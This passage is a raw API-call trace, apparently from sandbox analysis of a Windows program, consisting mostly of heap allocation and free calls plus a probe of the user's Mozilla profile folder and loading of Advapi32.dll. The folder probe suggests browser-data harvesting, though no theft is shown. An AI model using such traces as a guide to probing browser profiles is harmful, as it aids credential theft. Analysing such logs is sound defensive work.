(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0138.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0138.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0138.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0138.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0138.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0138.442] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0138.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0138.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0138.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0138.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0138.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0138.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0138.443] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0138.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0138.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0138.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0138.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0138.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0138.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0138.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0138.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0138.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0138.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0138.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0138.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.444] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Mozilla", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 0x9a4a40 [0138.444] FindClose (in: hFindFile=0x9a4a40 | out: hFindFile=0x9a4a40) returned 1 [0138.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0138.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0138.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0138.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0138.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0138.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0138.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0138.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0138.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0138.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0138.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0138.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0138.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0138.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0138.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0138.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0138.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0138.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0138.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0138.446] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0138.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0138.446] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0138.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0138.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1c8 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0138.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0138.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0138.447] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0138.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0138.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0138.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0138.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0138.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0138.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0138.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0138.448] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0c0 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0138.448] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0138.448] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0138.448] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0138.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0138.448] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0138.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0138.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0138.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0138.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0138.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.449] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0138.450] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.450] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 